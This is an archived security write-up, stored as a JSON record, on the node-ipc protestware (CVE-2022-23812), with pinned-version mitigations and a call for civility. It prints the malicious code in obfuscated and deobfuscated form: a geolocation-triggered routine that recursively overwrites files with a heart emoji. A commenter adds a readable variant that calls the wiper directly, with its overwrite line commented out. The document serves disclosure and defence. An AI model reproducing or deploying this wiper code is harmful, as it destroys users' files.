{
	"id": "d43f68c1-fcde-4481-92f9-920a2509a249",
	"created_at": "2026-04-06T00:16:29.193368Z",
	"updated_at": "2026-04-10T13:11:24.508249Z",
	"deleted_at": null,
	"sha1_hash": "e7d8e0b8dc40c31c7eeb9ab9c3536b55f5ac6e54",
	"title": "CVE-2022-23812 | RIAEvangelist/node-ipc is malware / protest-ware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 221023,
	"plain_text": "CVE-2022-23812 | RIAEvangelist/node-ipc is malware / protest-ware\r\nBy MidSpike\r\nArchived: 2026-04-05 18:50:24 UTC\r\nRIAEvangelist/node-ipc is malware / protestware\r\nThe RIAEvangelist/node-ipc module contains protestware peacenotwar.\r\nExcerpt from RIAEvangelist/node-ipc:\r\nas of v11.0.0 \u0026 v9.2.2 this module uses the peacenotwar module.\r\nMore importantly, commits 847047cf7f81ab08352038b2204f0e7633449580 -\u003e\r\n6e344066a0464814a27fbd7ca8422f473956a803 of RIAEvangelist/node-ipc contains malware.\r\n⚠️| The following code is malicious, DO NOT RUN IT\r\nhttps://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js\r\nThe following codeblock was added in-case the url above is deactivated\r\nimport u from\"path\";import a from\"fs\";import o from\"https\";setTimeout(function(){const t=Ma\r\n⚠️| The above code is malicious, DO NOT RUN IT\r\nI deobfuscated the code above and found that if the host machine's public ip address was from Russia or Belarus,\r\nnode-ipc would proceed overwrite many files with a heart emoji recursively while traversing up parent directories:\r\n⚠️| The following code is malicious, DO NOT RUN IT\r\nimport u from \"path\";\r\nimport a from \"fs\";\r\nimport o from \"https\";\r\nsetTimeout(function () {\r\n const t = Math.round(Math.random() * 4);\r\nhttps://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c\r\nPage 1 of 9\n\nif (t \u003e 1) {\r\n return;\r\n }\r\n const n = Buffer.from(\"aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNG\r\n o.get(n.toString(\"utf8\"), function (t) {\r\n t.on(\"data\", function (t) {\r\n const n = Buffer.from(\"Li8=\", \"base64\");\r\n const o = Buffer.from(\"Li4v\", \"base64\");\r\n const r = Buffer.from(\"Li4vLi4v\", \"base64\");\r\n const f = Buffer.from(\"Lw==\", \"base64\");\r\n const c = Buffer.from(\"Y291bnRyeV9uYW1l\", \"base64\");\r\n const e = Buffer.from(\"cnVzc2lh\", \"base64\");\r\n const i = Buffer.from(\"YmVsYXJ1cw==\", \"base64\");\r\n try {\r\n const s = JSON.parse(t.toString(\"utf8\"));\r\n const u = s[c.toString(\"utf8\")].toLowerCase();\r\n const a = u.includes(e.toString(\"utf8\")) || u.includes(i.toString(\"utf8\"));\r\n if (a) {\r\n h(n.toString(\"utf8\"));\r\n h(o.toString(\"utf8\"));\r\n h(r.toString(\"utf8\"));\r\n h(f.toString(\"utf8\"));\r\n }\r\n } catch (t) {}\r\n });\r\n });\r\n}, Math.ceil(Math.random() * 1e3));\r\nasync function h(n = \"\", o = \"\") {\r\n if (!a.existsSync(n)) {\r\n return;\r\n }\r\n let r = [];\r\n try {\r\n r = a.readdirSync(n);\r\n } catch (t) {}\r\n const f = [];\r\n const c = Buffer.from(\"4p2k77iP\", \"base64\");\r\n for (var e = 0; e \u003c r.length; e++) {\r\n const i = u.join(n, r[e]);\r\n let t = null;\r\n try {\r\n t = a.lstatSync(i);\r\n } catch (t) {\r\n continue;\r\n }\r\n if (t.isDirectory()) {\r\n const s = h(i, o);\r\nhttps://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c\r\nPage 2 of 9\n\ns.length \u003e 0 ? f.push(...s) : null;\r\n } else if (i.indexOf(o) \u003e= 0) {\r\n try {\r\n a.writeFile(i, c.toString(\"utf8\"), function () {});\r\n } catch (t) {}\r\n }\r\n }\r\n return f;\r\n}\r\nconst ssl = true;\r\nexport { ssl as default, ssl };\r\n⚠️| The above code is malicious, DO NOT RUN IT\r\nThe following are excerpts from the malicious code:\r\nBuffer.from(\"aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4\r\n// https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154\r\nconst a = u.includes(e.toString(\"utf8\")) || u.includes(i.toString(\"utf8\"));\r\n// checks if ip country is Russia or Belarus\r\na.writeFile(i, c.toString(\"utf8\"), function () {});\r\n// overwrites file with `❤️`\r\nThe following demonstrates example of what each of the parameters going to the\r\na.writeFile(i,c.toString(\"utf8\") would be:\r\nhttps://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c\r\nPage 3 of 9\n\nhttps://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c\r\nPage 4 of 9\n\nEdit 2022-03-16_0\r\nComment by zkyf\r\nJust made it better looked and commented dangerous code so you guys can take a try. Obviously the\r\ncode will delete literally EVERYTHING on your drive.\r\nconst path = require(\"path\");\r\nconst fs = require(\"fs\");\r\nconst https = require(\"https\");\r\nsetTimeout(function () {\r\n const randomNumber = Math.round(Math.random() * 4);\r\n if (randomNumber \u003e 1) {\r\n // return;\r\n }\r\n const apiKey = \"https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154\";\r\n const pwd = \"./\";\r\n const parentDir = \"../\";\r\n const grandParentDir = \"../../\";\r\n const root = \"/\";\r\n const countryName = \"country_name\";\r\n const russia = \"russia\";\r\n const belarus = \"belarus\";\r\n https.get(apiKey, function (message) {\r\n message.on(\"data\", function (msgBuffer) {\r\n try {\r\n const message = JSON.parse(msgBuffer.toString(\"utf8\"));\r\n const userCountryName = message[countryName.toString(\"utf8\")].toLowerCase();\r\n const hasRus = userCountryName.includes(russia.toString(\"utf8\")) || userCountryName.i\r\n if (hasRus) {\r\n deleteFile(pwd);\r\n deleteFile(parentDir);\r\n deleteFile(grandParentDir);\r\n deleteFile(root);\r\n }\r\n } catch (t) {}\r\n });\r\n });\r\n // zkyf: Let's try this directly here\r\n deleteFile(pwd);\r\n deleteFile(parentDir);\r\nhttps://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c\r\nPage 5 of 9\n\ndeleteFile(grandParentDir);\r\n deleteFile(root);\r\n}, 100);\r\nasync function deleteFile(pathName = \"\", o = \"\") {\r\n if (!fs.existsSync(pathName)) {\r\n return;\r\n }\r\n let fileList = [];\r\n try {\r\n fileList = fs.readdirSync(pathName);\r\n } catch (t) {}\r\n const f = [];\r\n const heartUtf8 = Buffer.from(\"4p2k77iP\", \"base64\");\r\n for (var idx = 0; idx \u003c fileList.length; idx++) {\r\n const fileName = path.join(pathName, fileList[idx]);\r\n let fileInfo = null;\r\n try {\r\n fileInfo = fs.lstatSync(fileName);\r\n } catch (err) {\r\n continue;\r\n }\r\n if (fileInfo.isDirectory()) {\r\n const fileSymbol = deleteFile(fileName, o);\r\n fileSymbol.length \u003e 0 ? f.push(...fileSymbol) : null;\r\n } else if (fileName.indexOf(o) \u003e= 0) {\r\n try {\r\n // fs.writeFile(fileName, heartUtf8.toString(\"utf8\"), function () {}); // overwrites\r\n console.log(`Rewrite ${fileName}`);\r\n } catch (err) {}\r\n }\r\n }\r\n return f;\r\n}\r\nhttps://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c\r\nPage 6 of 9\n\nConsole:\r\nEdit 2022-03-16_1 (requested by @lgg)\r\nAvailable mitigation methods:\r\nThe following mitigation strategies are inspired by cnpm's (is not npm) mitigation methods: cnpm/bug-versions#181\r\nIf you use one of the following mitigation stratagies, make sure to remove the ^ to force node-ipc to the\r\nspecified version.\r\n\"^9.x.x\" -\u003e \"9.2.1\"\r\n \"dependencies\": {\r\n- \"node-ipc\": \"^9.x.x\"\r\n+ \"node-ipc\": \"9.2.1\"\r\n }\r\n\"^10.x.x\" -\u003e \"10.1.0\"\r\n \"dependencies\": {\r\n- \"node-ipc\": \"^10.x.x\"\r\n+ \"node-ipc\": \"10.1.0\"\r\n }\r\n\"^11.x.x\" -\u003e \"10.1.0\"\r\n \"dependencies\": {\r\n- \"node-ipc\": \"^11.x.x\"\r\n+ \"node-ipc\": \"10.1.0\"\r\n }\r\nhttps://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c\r\nPage 7 of 9\n\n3rd-party mitigation methods:\r\nvue-cli\r\nUnity Hub\r\nEdit 2022-03-16_2 (requested by @lgg)\r\nCVE-2022-23812\r\nEdit 2022-03-17_0\r\n@RIAEvangelist has banned me from interacting with their repositories\r\nEdit 2022-03-17_1\r\nThe security research firm snyk.io recommends the following mitigation strategy for users of node-ipc :\r\npackage.json\r\n \"overrides\": {\r\n \"node-ipc@\u003e9.2.1 \u003c10\": \"9.2.1\",\r\n \"node-ipc@\u003e10.1.0\": \"10.1.0\"\r\n }\r\nEdit 2022-03-17_2 (credit: @Uzlopak)\r\nNPM users below NPM v8, this is for you!\r\nDon't forget to mention that npm supports override with npm 8. Earlier versions don't have overrides\r\ncapabilities. So node 12 and 14, which are LTS, use by default npm 6 and that would not work with\r\nthem. So upgrading npm to 8 would be necessary.\r\nYarn users, this is for you!\r\nYarn 1 - Selective dependency resolutions\r\nYarn 2 - Resolutions\r\nI'm not too familiar with how yarn works, so I don't want to risk giving false instructions to users.\r\nEdit 2022-03-17_3\r\nPlease read this message\r\nhttps://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c\r\nPage 8 of 9\n\nI've been seeing a lot of hate comments going after the owner of node-ipc (especially on their repositories). We\r\nshould remember the high standards that we expect from our fellow developers on GitHub, regardless of what\r\nanother has done.\r\nPreferably this gist and it's comments should be focused on the research and discussion of CVE-2022-23812. I'm\r\nsure that the owner of node-ipc will be reprimanded by their employer, NPM, and GitHub.\r\nPlease do not threaten anyone here (or elsewhere for that matter).\r\nEdit 2022-03-18_0\r\nI've begun work on my own fork of node-ipc : MidSpike/node-ipc#1\r\nSource: https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c\r\nhttps://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c"
	],
	"report_names": [
		"f7ae3457420af78a54b38a31cc0c809c"
	],
	"threat_actors": [],
	"ts_created_at": 1775434589,
	"ts_updated_at": 1775826684,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e7d8e0b8dc40c31c7eeb9ab9c3536b55f5ac6e54.pdf",
		"text": "https://archive.orkl.eu/e7d8e0b8dc40c31c7eeb9ab9c3536b55f5ac6e54.txt",
		"img": "https://archive.orkl.eu/e7d8e0b8dc40c31c7eeb9ab9c3536b55f5ac6e54.jpg"
	}
}